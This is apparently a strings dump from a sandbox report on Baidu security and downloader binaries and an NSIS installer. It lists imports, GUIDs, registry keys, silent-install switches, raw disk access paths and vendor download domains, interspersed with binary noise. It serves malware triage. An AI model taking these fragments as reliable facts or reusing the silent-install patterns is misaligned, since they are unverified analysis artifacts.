?get_const_instance@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@SAABV?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@XZ
?get_const_instance@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@SAABV?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@XZ
?get_instance@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@CAAAV?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@XZ
?get_instance@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@CAAAV?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@XZ
?get_mutable_instance@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@SAAAV?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@XZ
?get_mutable_instance@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@SAAAV?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@XZ
?instance@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@0AAV?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@A
?instance@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@0AAV?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@A
?is_destroyed@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@SA_NXZ
?is_destroyed@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@SA_NXZ
?t@?1??get_instance@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@CAAAV?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@XZ@4V?$singleton_wrapper@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@detail@34@A
?t@?1??get_instance@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@CAAAV?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@XZ@4V?$singleton_wrapper@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@detail@34@A
.?AVCBDCmdParser@BDMLogicMisc@@
.?AVCBDCmdParser@BDMLogicMisc@@
.?AVCBDMConfigReportRecord@@
.?AVCBDMConfigReportRecord@@
.?AVCPluginMenuItemExecutor@@
.?AVCPluginMenuItemExecutor@@
.?AVIPluginCmdExecutor@@
.?AVIPluginCmdExecutor@@
.?AVCBDMLauchReportRecord@@
.?AVCBDMLauchReportRecord@@
.?AUPluginInfoPassiveSaver@@
.?AUPluginInfoPassiveSaver@@
.?AVCCmdPluginLauncher@@
.?AVCCmdPluginLauncher@@
.?AVCExePluginLauncher@@
.?AVCExePluginLauncher@@
.?AVheader@http@bena@@
.?AVheader@http@bena@@
.?AVresponse@http@bena@@
.?AVresponse@http@bena@@
.?AVrequest@http@bena@@
.?AVrequest@http@bena@@
#include "windows.h"
#include "windows.h"
ÿF=
ÿF=
03u3
03u3
00h0{0
00h0{0
;(<.>
;(<.>
5W5x5
5W5x5
45q5
45q5
343d3
343d3
8‡8S8]8m8r8
8‡8S8]8m8r8
373s3
373s3
9—9s9
9—9s9
9!:4:]:|:
9!:4:]:|:
;&; ;?;\;
;&; ;?;\;
4!4;4_4|4
4!4;4_4|4
4Q5U5l5v5
4Q5U5l5v5
131=1#323?3^3
131=1#323?3^3
9’9d9
9’9d9
4 4$4(4,404
4 4$4(4,404
6}7t7
6}7t7
1&1-141?1
1&1-141?1
1)12191?1
1)12191?1
5e6S6
5e6S6
0!030@0|0
0!030@0|0
= =$=(=,=0=
= =$=(=,=0=
9 9$9(9,9
9 9$9(9,9
\PluginSetup.xml
\PluginSetup.xml
PackCache.xml
PackCache.xml
##cmd:
##cmd:
UninstalledPlugins.xml
UninstalledPlugins.xml
BDMDownload.dll
BDMDownload.dll
/handle=%d /supplyid=%d /installmode=2 /S /D=%s
/handle=%d /supplyid=%d /installmode=2 /S /D=%s
%d.%d
%d.%d
\GlobalPluginInfo.xml
\GlobalPluginInfo.xml
\LocalPluginInfo.xml
\LocalPluginInfo.xml
\HotPlugins.xml
\HotPlugins.xml
\HotPlugin.bnr
\HotPlugin.bnr
PluginSetup.xml
PluginSetup.xml
%s%d\%ld\
%s%d\%ld\
Download.data
Download.data
download.db
download.db
publish.db
publish.db
profile.db
profile.db
%s_%d
%s_%d
%s%d\
%s%d\
metadata.db
metadata.db
\updateTips.dat
\updateTips.dat
Baiduan.exe -stmd=2 -selplugin={BFB3F7A3-4FA1-466f-AB97-A96EFA9EFA6E}\{D8CD8DC5-D053-402a-99D9-47554C744B0C}
Baiduan.exe -stmd=2 -selplugin={BFB3F7A3-4FA1-466f-AB97-A96EFA9EFA6E}\{D8CD8DC5-D053-402a-99D9-47554C744B0C}
BDMQueryObj is faild is 0x%x
BDMQueryObj is faild is 0x%x
QueryIpcAddressHelper is faild is 0x%x
QueryIpcAddressHelper is faild is 0x%x
QueryIpcAddressHelper is success ,but IpcAddress List is Empty
QueryIpcAddressHelper is success ,but IpcAddress List is Empty
{AF849809-EC94-47CB-80E9-1452BEC92ADA}
{AF849809-EC94-47CB-80E9-1452BEC92ADA}
BDMNet.dll
BDMNet.dll
{1CB69707-E42B-4128-8A00-7336B93DC262}
{1CB69707-E42B-4128-8A00-7336B93DC262}
baiduan.exe -stmd=6
baiduan.exe -stmd=6
ActivateMainApp_{BFB3F7A3-4FA1-466f-AB97-A96EFA9EFA6E}\
ActivateMainApp_{BFB3F7A3-4FA1-466f-AB97-A96EFA9EFA6E}\
{E9C9ED70-127F-4BE4-9821-74160A768A90}
{E9C9ED70-127F-4BE4-9821-74160A768A90}
{7576896A-4E2F-4665-AB7D-95938D2632F1}
{7576896A-4E2F-4665-AB7D-95938D2632F1}
{F5E93978-539C-476B-9A7B-B6C32025A557}
{F5E93978-539C-476B-9A7B-B6C32025A557}
{716CE9AE-35B9-4639-B585-47F6B47B4E2D}
{716CE9AE-35B9-4639-B585-47F6B47B4E2D}
{D8CD8DC5-D053-402a-99D9-47554C744B0C}
{D8CD8DC5-D053-402a-99D9-47554C744B0C}
BDMgr.exe -stmd=7
BDMgr.exe -stmd=7
BDMgr.exe -stmd=6
BDMgr.exe -stmd=6
BDMgr.exe -stmd=7 -selplugin={914438D6-1EC4-434A-B6EC-20F84894C395}
BDMgr.exe -stmd=7 -selplugin={914438D6-1EC4-434A-B6EC-20F84894C395}
hXXp://weishi.baidu.com/feedback/
hXXp://weishi.baidu.com/feedback/
TrayPluginContainerConfig.xml
TrayPluginContainerConfig.xml
{E059A29F-D2ED-4f28-849A-851AA9D5A05C}
{E059A29F-D2ED-4f28-849A-851AA9D5A05C}
QQ.exe
QQ.exe
screen_snapshot.exe
screen_snapshot.exe
SnippingTool.exe
SnippingTool.exe
CommonRes.rdb
CommonRes.rdb
BDMUpdate.dll
BDMUpdate.dll
HKEY_LOCAL_MACHINE\SOFTWARE\Baidu\BaiduAn
HKEY_LOCAL_MACHINE\SOFTWARE\Baidu\BaiduAn
1800000
1800000
ic_question_48_48.png
ic_question_48_48.png
file='skin_image1.png' xtiled='true' ytiled='true'
file='skin_image1.png' xtiled='true' ytiled='true'
BDASoftmgr.exe
BDASoftmgr.exe
BDASWAcc.exe
BDASWAcc.exe
BaiduAnBugRpt.exe
BaiduAnBugRpt.exe
BDMgr.exe -stmd=61 -prel
BDMgr.exe -stmd=61 -prel
BaiduAn.exe
BaiduAn.exe
BaiduAnSvc.exe
BaiduAnSvc.exe
BaiduAnUpdate.exe
BaiduAnUpdate.exe
Client.exe
Client.exe
\GameNoDisturb.ini
\GameNoDisturb.ini
Shell32.dll
Shell32.dll
FreeDistractionTips.xml
FreeDistractionTips.xml
BaiduAn{D8A4131D-3A7A-48a1-B080-28E1DC04F7C2}
BaiduAn{D8A4131D-3A7A-48a1-B080-28E1DC04F7C2}
ic_title_logo.png
ic_title_logo.png
btn_exit_hover_16_16.png
btn_exit_hover_16_16.png
btn_opennodisturb_hover_16_16.png
btn_opennodisturb_hover_16_16.png
btn_nodisturb_hover_16_16.png
btn_nodisturb_hover_16_16.png
btn_acc_hover_16_16.png
btn_acc_hover_16_16.png
ico_mainpage_normal.png
ico_mainpage_normal.png
btn_exit_normal_16_16.png
btn_exit_normal_16_16.png
btn_acc_normal_16_16.png
btn_acc_normal_16_16.png
btn_opennodisturb_normal_16_16.png
btn_opennodisturb_normal_16_16.png
btn_nodisturb_normal_16_16.png
btn_nodisturb_normal_16_16.png
TrayMenu.xml
TrayMenu.xml
Config\config.ini
Config\config.ini
%d-%d-%d
%d-%d-%d
ActivateTrayApp_{E6F42A49-F45B-4FDF-ADD8-DFAE10011BD1}
ActivateTrayApp_{E6F42A49-F45B-4FDF-ADD8-DFAE10011BD1}
2.3.1.2372
2.3.1.2372
hXXp://weishi.baidu.com
hXXp://weishi.baidu.com
hXXp://weishi.baidu.com/privacy.html
hXXp://weishi.baidu.com/privacy.html
about.xml
about.xml
@advapi32.dll
@advapi32.dll
QueryIpcAddressHelper
QueryIpcAddressHelper
testtips.xml
testtips.xml
D:\BDdownloads
D:\BDdownloads
Global\{74B41C93-AC9A-4a9e-85E0-27A02EA509FA}
Global\{74B41C93-AC9A-4a9e-85E0-27A02EA509FA}
ntdll.dll
ntdll.dll
EXPLORER.EXE
EXPLORER.EXE
explorer.exe
explorer.exe
B\\.\pipe\{B99F6A00-E6C9-4253-9708-C6EFB939FD53}
B\\.\pipe\{B99F6A00-E6C9-4253-9708-C6EFB939FD53}
BDMUPDATE_{626ADED9-5989-4e97-A482-09AC95C17D47}
BDMUPDATE_{626ADED9-5989-4e97-A482-09AC95C17D47}
.bdtmp
.bdtmp
.old_
.old_
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0
kernel32.dll
kernel32.dll
\Global.db
\Global.db
Fiphlpapi.dll
Fiphlpapi.dll
F\\.\PhysicalDrive%d
F\\.\PhysicalDrive%d
\\.\Scsi%d:
\\.\Scsi%d:
%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\Config\
%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\Config\
BaiduanTray.exe
BaiduanTray.exe
bddownloader.exe_3936:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
8%uvP
8%uvP
;*u.SUj
;*u.SUj
PSSSSSSh
PSSSSSSh
>.uTV
>.uTV
j SSSSSSSh
j SSSSSSSh
aSSSh
aSSSh
FTPjK
FTPjK
FtPj;
FtPj;
C.PjRV
C.PjRV
tGHt.Ht&
tGHt.Ht&
YYtCP
YYtCP
asio.ssl
asio.ssl
asio.misc
asio.misc
D:\dl\boost_1_44_0_build\include\boost/exception/detail/exception_ptr.hpp
D:\dl\boost_1_44_0_build\include\boost/exception/detail/exception_ptr.hpp
asio.misc error
asio.misc error
asio.ssl error
asio.ssl error
dtrp.download.iyuntian.com
dtrp.download.iyuntian.com
res.download.iyuntian.com
res.download.iyuntian.com
tk.download.iyuntian.com
tk.download.iyuntian.com
utk.download.iyuntian.com
utk.download.iyuntian.com
thread.exit_event
thread.exit_event
thread.entry_event
thread.entry_event
%s\Connection
%s\Connection
System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
VVV.baidu.com.cn
VVV.baidu.com.cn
HTTP/1.1
HTTP/1.1
$MD5Version: 1.0.0 November-19-1997 $
$MD5Version: 1.0.0 November-19-1997 $
$Id: md5.c,v 1.1.1.1 2004/05/17 13:23:36 rcrittenden0569 Exp $
$Id: md5.c,v 1.1.1.1 2004/05/17 13:23:36 rcrittenden0569 Exp $
%s>
%s>
standalone="%s"
standalone="%s"
encoding="%s"
encoding="%s"
version="%s"
version="%s"
X;
X;
%s='%s'
%s='%s'
%s="%s"
%s="%s"
PKEY_CUSTOMNAME
PKEY_CUSTOMNAME
PKEY_PRODUCTNAME
PKEY_PRODUCTNAME
PKEY_ISSHOW
PKEY_ISSHOW
PKEY_EXITTIME
PKEY_EXITTIME
PKEY_CUSTOMID
PKEY_CUSTOMID
PKEY_START_STATUS
PKEY_START_STATUS
PKEY_GUID
PKEY_GUID
PKEY_MINORVERSION
PKEY_MINORVERSION
PKEY_MAJORVERSION
PKEY_MAJORVERSION
PKEY_COREVERSION
PKEY_COREVERSION
PKEY_EXEVERSION
PKEY_EXEVERSION
PKEY_UPDATESERVERPORT
PKEY_UPDATESERVERPORT
PKEY_UPDATESERVERIP
PKEY_UPDATESERVERIP
PKEY_PSHASH
PKEY_PSHASH
PKEY_PSNAME
PKEY_PSNAME
PKEY_EXHASH
PKEY_EXHASH
PKEY_EXNAME
PKEY_EXNAME
PKEY_TNHASH
PKEY_TNHASH
PKEY_TNNAME
PKEY_TNNAME
PKEY_COREHASH
PKEY_COREHASH
PKEY_CORENAME
PKEY_CORENAME
PKEY_EXEHASH
PKEY_EXEHASH
PKEY_EXENAME
PKEY_EXENAME
PKEY_UPDATEURL
PKEY_UPDATEURL
PKEY_FILENAME
PKEY_FILENAME
PKEY_RESULT
PKEY_RESULT
up.download.iyuntian.com
up.download.iyuntian.com
PKEY_TTL
PKEY_TTL
PKEY_ISFIX
PKEY_ISFIX
PKEY_VERSION
PKEY_VERSION
PKEY_FILEEMULE_HASH
PKEY_FILEEMULE_HASH
PKEY_FILEEMULE_SIZE
PKEY_FILEEMULE_SIZE
PKEY_FILEEMULE_NAME
PKEY_FILEEMULE_NAME
PKEY_FILEBT_HASH
PKEY_FILEBT_HASH
PKEY_FILEBT_SIZE
PKEY_FILEBT_SIZE
PKEY_FILEBT_NAME
PKEY_FILEBT_NAME
PKEY_FILECORE_HASH
PKEY_FILECORE_HASH
PKEY_FILECORE_SIZE
PKEY_FILECORE_SIZE
PKEY_FILECORE_NAME
PKEY_FILECORE_NAME
PKEY_URL
PKEY_URL
PKEY_PERIOD
PKEY_PERIOD
kernel32.dll
kernel32.dll
.mixcrt
.mixcrt
KERNEL32.DLL
KERNEL32.DLL
Please contact the application's support team for more information.
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
mscoree.dll
mscoree.dll
GetProcessWindowStation
GetProcessWindowStation
USER32.DLL
USER32.DLL
operator
operator
portuguese-brazilian
portuguese-brazilian
FhModule = %u, pfunc = %u
FhModule = %u, pfunc = %u
DbgHelp.dll
DbgHelp.dll
crash.dmp
crash.dmp
0xX
0xX
DlBugReport.ini
DlBugReport.ini
DlBugReport.dat
DlBugReport.dat
%Y-%m-%d %H:%M:%S
%Y-%m-%d %H:%M:%S
%d.%d.%d.%d
%d.%d.%d.%d
,d-d-d d:d:d
,d-d-d d:d:d
[ 0xX ] %s [%s]
[ 0xX ] %s [%s]
Error: Write address 0xX
Error: Write address 0xX
Error: Read address 0xX
Error: Read address 0xX
version = %s
version = %s
%s-----------------------------------
%s-----------------------------------
Type: %s
Type: %s
Address: 0xX
Address: 0xX
bddownloader.exe
bddownloader.exe
EXCEPTION_FLT_INVALID_OPERATION
EXCEPTION_FLT_INVALID_OPERATION
EXCEPTION_FLT_DENORMAL_OPERAND
EXCEPTION_FLT_DENORMAL_OPERAND
(%d,%d,%d,%d)
(%d,%d,%d,%d)
0xX:
0xX:
%s::x;
%s::x;
0xX[%X] %s:
0xX[%X] %s:
%s::x
%s::x
Local\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flag
Local\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flag
Visual C CRT: Not enough memory to complete call to strerror.
Visual C CRT: Not enough memory to complete call to strerror.
Broken pipe
Broken pipe
Inappropriate I/O control operation
Inappropriate I/O control operation
Operation not permitted
Operation not permitted
d:\dl\DownloadProxy_proj\Output\Release\bddownloader.pdb
d:\dl\DownloadProxy_proj\Output\Release\bddownloader.pdb
GetProcessHeap
GetProcessHeap
CreateIoCompletionPort
CreateIoCompletionPort
GetCPInfo
GetCPInfo
GetConsoleOutputCP
GetConsoleOutputCP
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
RegDeleteKeyW
RegDeleteKeyW
RegCloseKey
RegCloseKey
RegCreateKeyExW
RegCreateKeyExW
RegOpenKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegQueryInfoKeyW
RegEnumKeyExW
RegEnumKeyExW
RegOpenKeyW
RegOpenKeyW
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
ShellExecuteW
ShellExecuteW
SHELL32.dll
SHELL32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
SHLWAPI.dll
SHLWAPI.dll
COMCTL32.dll
COMCTL32.dll
WS2_32.dll
WS2_32.dll
VERSION.dll
VERSION.dll
NetWkstaTransportEnum
NetWkstaTransportEnum
NETAPI32.dll
NETAPI32.dll
PSAPI.DLL
PSAPI.DLL
imagehlp.dll
imagehlp.dll
zcÃ
zcÃ
'DownloadProxy.EXE'
'DownloadProxy.EXE'
BDDownloadProxy.Downloader.1 = s 'Downloader Class'
BDDownloadProxy.Downloader.1 = s 'Downloader Class'
CLSID = s '{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}'
CLSID = s '{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}'
BDDownloadProxy.Downloader = s 'Downloader Class'
BDDownloadProxy.Downloader = s 'Downloader Class'
CurVer = s 'BDDownloadProxy.Downloader.1'
CurVer = s 'BDDownloadProxy.Downloader.1'
ForceRemove {91B5E4DE-4C97-41CD-9F94-84BFAABB7371} = s 'Downloader Class'
ForceRemove {91B5E4DE-4C97-41CD-9F94-84BFAABB7371} = s 'Downloader Class'
ProgID = s 'BDDownloadProxy.Downloader.1'
ProgID = s 'BDDownloadProxy.Downloader.1'
VersionIndependentProgID = s 'BDDownloadProxy.Downloader'
VersionIndependentProgID = s 'BDDownloadProxy.Downloader'
'TypeLib' = s '{DA624F8F-98BF-4B03-AD11-A12D07119E81}'
'TypeLib' = s '{DA624F8F-98BF-4B03-AD11-A12D07119E81}'
stdole2.tlbWWW
stdole2.tlbWWW
cuiMsgTypeWWW
cuiMsgTypeWWW
pMsgParamWWWd
pMsgParamWWWd
6|pTaskUrl
6|pTaskUrl
Created by MIDL version 6.00.0366 at Thu Jan 02 17:35:38 2014
Created by MIDL version 6.00.0366 at Thu Jan 02 17:35:38 2014
&UU*&&&&&&&&*UU(%%%%%%%%(UU)%%%%%%%%)UU.$$$$$$$$.UU1''''''''1UU
&UU*&&&&&&&&*UU(%%%%%%%%(UU)%%%%%%%%)UU.$$$$$$$$.UU1''''''''1UU
"7,,11,,7"
"7,,11,,7"
2222222222222222
2222222222222222
11///20.
11///20.
##!!! !!!##
##!!! !!!##
.02///11
.02///11
mM............................................................Mm
mM............................................................Mm
mM..........................................Mm
mM..........................................Mm
(((((((JgT..TgJ(((((((
(((((((JgT..TgJ(((((((
ÿfH
ÿfH
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_CURRENT_CONFIG
bdpunchproxy.dll
bdpunchproxy.dll
bddownload_config.xml
bddownload_config.xml
dl.dll
dl.dll
\bddownloader.exe
\bddownloader.exe
{51BEE30D-EEC8-4BA3-930B-298B8E759EB1}
{51BEE30D-EEC8-4BA3-930B-298B8E759EB1}
CLSID\%s\LocalServer32
CLSID\%s\LocalServer32
{%X-%X-%X-%X-%X%X}
{%X-%X-%X-%X-%X%X}
Mscoree.dll
Mscoree.dll
BDDownloadProxy.Downloader.1
BDDownloadProxy.Downloader.1
\Installlog.txt
\Installlog.txt
\bdcomproxy.dll
\bdcomproxy.dll
\7z.dll
\7z.dll
\bdpunchproxy.dll
\bdpunchproxy.dll
\dl.dll
\dl.dll
regsvr32.exe
regsvr32.exe
Kernel32.dll
Kernel32.dll
7z.dll
7z.dll
C\StringFileInfo\xx\
C\StringFileInfo\xx\
netsh.exe
netsh.exe
\\.\PhysicalDrive%d
\\.\PhysicalDrive%d
\\.\Scsi%d:
\\.\Scsi%d:
oiphlpapi.dll
oiphlpapi.dll
\Global.db
\Global.db
PBDD_Temp_Exe
PBDD_Temp_Exe
%*.*f
%*.*f
: %s/s
: %s/s
%s: %s
%s: %s
\TDConfig.ini
\TDConfig.ini
H\set.log
H\set.log
c:\program files\common files\baidu\bddownload\107\bddownloader.exe
c:\program files\common files\baidu\bddownload\107\bddownloader.exe
(1-10240)
(1-10240)
1.0.107.0
1.0.107.0
spkjrjp_30279.exe_1632:
.text
.text
`.rdata
`.rdata
@.data
@.data
.ndata
.ndata
.rsrc
.rsrc
@.reloc
@.reloc
RegDeleteKeyExW
RegDeleteKeyExW
Kernel32.DLL
Kernel32.DLL
PSAPI.DLL
PSAPI.DLL
%s=%s
%s=%s
GetWindowsDirectoryW
GetWindowsDirectoryW
KERNEL32.dll
KERNEL32.dll
ExitWindowsEx
ExitWindowsEx
GetAsyncKeyState
GetAsyncKeyState
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
SHFileOperationW
SHFileOperationW
ShellExecuteW
ShellExecuteW
SHELL32.dll
SHELL32.dll
RegDeleteKeyW
RegDeleteKeyW
RegCloseKey
RegCloseKey
RegEnumKeyW
RegEnumKeyW
RegOpenKeyExW
RegOpenKeyExW
RegCreateKeyExW
RegCreateKeyExW
ADVAPI32.dll
ADVAPI32.dll
COMCTL32.dll
COMCTL32.dll
ole32.dll
ole32.dll
VERSION.dll
VERSION.dll
SsH/b
SsH/b
.sI h
.sI h
qdZz%x
qdZz%x
s}p%c
s}p%c
> >$>(>,>0>|>
> >$>(>,>0>|>
Thawte Certification1
Thawte Certification1
hXXp://ocsp.thawte.com0
hXXp://ocsp.thawte.com0
.hXXp://crl.thawte.com/ThawteTimestampingCA.crl0
.hXXp://crl.thawte.com/ThawteTimestampingCA.crl0
hXXp://ts-ocsp.ws.symantec.com07
hXXp://ts-ocsp.ws.symantec.com07
hXXp://ts-aia.ws.symantec.com/tss-ca-g2.cer0
hXXp://ts-aia.ws.symantec.com/tss-ca-g2.cer0
hXXp://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
hXXp://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
.Class 3 Public Primary Certification Authority0
.Class 3 Public Primary Certification Authority0
hXXp://crl.verisign.com/pca3.crl0
hXXp://crl.verisign.com/pca3.crl0
hXXps://VVV.verisign.com/cps0
hXXps://VVV.verisign.com/cps0
#hXXp://logo.verisign.com/vslogo.gif04
#hXXp://logo.verisign.com/vslogo.gif04
hXXp://ocsp.verisign.com0>
hXXp://ocsp.verisign.com0>
DhXXp://crl.microsoft.com/pki/crl/products/MicrosoftCodeVerifRoot.crl0
DhXXp://crl.microsoft.com/pki/crl/products/MicrosoftCodeVerifRoot.crl0
n.aAHu
n.aAHu
2Terms of use at hXXps://VVV.verisign.com/rpa (c)101.0,
2Terms of use at hXXps://VVV.verisign.com/rpa (c)101.0,
2Beijing baidu Netcom science and technology co.ltd1>0
2Beijing baidu Netcom science and technology co.ltd1>0
2Beijing baidu Netcom science and technology co.ltd0
2Beijing baidu Netcom science and technology co.ltd0
/hXXp://csc3-2010-crl.verisign.com/CSC3-2010.crl0D
/hXXp://csc3-2010-crl.verisign.com/CSC3-2010.crl0D
hXXps://VVV.verisign.com/rpa0
hXXps://VVV.verisign.com/rpa0
hXXp://ocsp.verisign.com0;
hXXp://ocsp.verisign.com0;
/hXXp://csc3-2010-aia.verisign.com/CSC3-2010.cer0
/hXXp://csc3-2010-aia.verisign.com/CSC3-2010.cer0
hXXps://VVV.verisign.com/cps0*
hXXps://VVV.verisign.com/cps0*
#hXXp://crl.verisign.com/pca3-g5.crl04
#hXXp://crl.verisign.com/pca3-g5.crl04
hXXp://ocsp.verisign.com0
hXXp://ocsp.verisign.com0
Nullsoft Install System v2.46.5-Unicode
Nullsoft Install System v2.46.5-Unicode
logging set to %d
logging set to %d
settings logging to %d
settings logging to %d
created uninstaller: %d, "%s"
created uninstaller: %d, "%s"
WriteReg: error creating key "%s\%s"
WriteReg: error creating key "%s\%s"
WriteReg: error writing into "%s\%s" "%s"
WriteReg: error writing into "%s\%s" "%s"
WriteRegBin: "%s\%s" "%s"="%s"
WriteRegBin: "%s\%s" "%s"="%s"
WriteRegDWORD: "%s\%s" "%s"="0xx"
WriteRegDWORD: "%s\%s" "%s"="0xx"
WriteRegExpandStr: "%s\%s" "%s"="%s"
WriteRegExpandStr: "%s\%s" "%s"="%s"
WriteRegStr: "%s\%s" "%s"="%s"
WriteRegStr: "%s\%s" "%s"="%s"
DeleteRegKey: "%s\%s"
DeleteRegKey: "%s\%s"
DeleteRegValue: "%s\%s" "%s"
DeleteRegValue: "%s\%s" "%s"
WriteINIStr: wrote [%s] %s=%s in %s
WriteINIStr: wrote [%s] %s=%s in %s
CopyFiles "%s"->"%s"
CopyFiles "%s"->"%s"
CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
Error registering DLL: Could not load %s
Error registering DLL: Could not load %s
Error registering DLL: %s not found in %s
Error registering DLL: %s not found in %s
GetTTFFontName(%s) returned %s
GetTTFFontName(%s) returned %s
GetTTFVersionString(%s) returned %s
GetTTFVersionString(%s) returned %s
Exec: failed createprocess ("%s")
Exec: failed createprocess ("%s")
Exec: success ("%s")
Exec: success ("%s")
Exec: command="%s"
Exec: command="%s"
ExecShell: success ("%s": file:"%s" params:"%s")
ExecShell: success ("%s": file:"%s" params:"%s")
ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
Exch: stack
Exch: stack
RMDir: "%s"
RMDir: "%s"
MessageBox: %d,"%s"
MessageBox: %d,"%s"
Delete: "%s"
Delete: "%s"
File: wrote %d to "%s"
File: wrote %d to "%s"
File: skipped: "%s" (overwriteflag=%d)
File: skipped: "%s" (overwriteflag=%d)
File: error creating "%s"
File: error creating "%s"
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"
Rename failed: %s
Rename failed: %s
Rename on reboot: %s
Rename on reboot: %s
Rename: %s
Rename: %s
IfFileExists: file "%s" does not exist, jumping %d
IfFileExists: file "%s" does not exist, jumping %d
IfFileExists: file "%s" exists, jumping %d
IfFileExists: file "%s" exists, jumping %d
CreateDirectory: "%s" created
CreateDirectory: "%s" created
CreateDirectory: can't create "%s" - a file already exists
CreateDirectory: can't create "%s" - a file already exists
CreateDirectory: can't create "%s" (err=%d)
CreateDirectory: can't create "%s" (err=%d)
CreateDirectory: "%s" (%d)
CreateDirectory: "%s" (%d)
SetFileAttributes: "%s":X
SetFileAttributes: "%s":X
Sleep(%d)
Sleep(%d)
detailprint: %s
detailprint: %s
Call: %d
Call: %d
Aborting: "%s"
Aborting: "%s"
Jump: %d
Jump: %d
verifying installer: %d%%
verifying installer: %d%%
unpacking data: %d%%
unpacking data: %d%%
... %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
~nsu.tmp
install.log
install.log
%u.%u%s%s
%u.%u%s%s
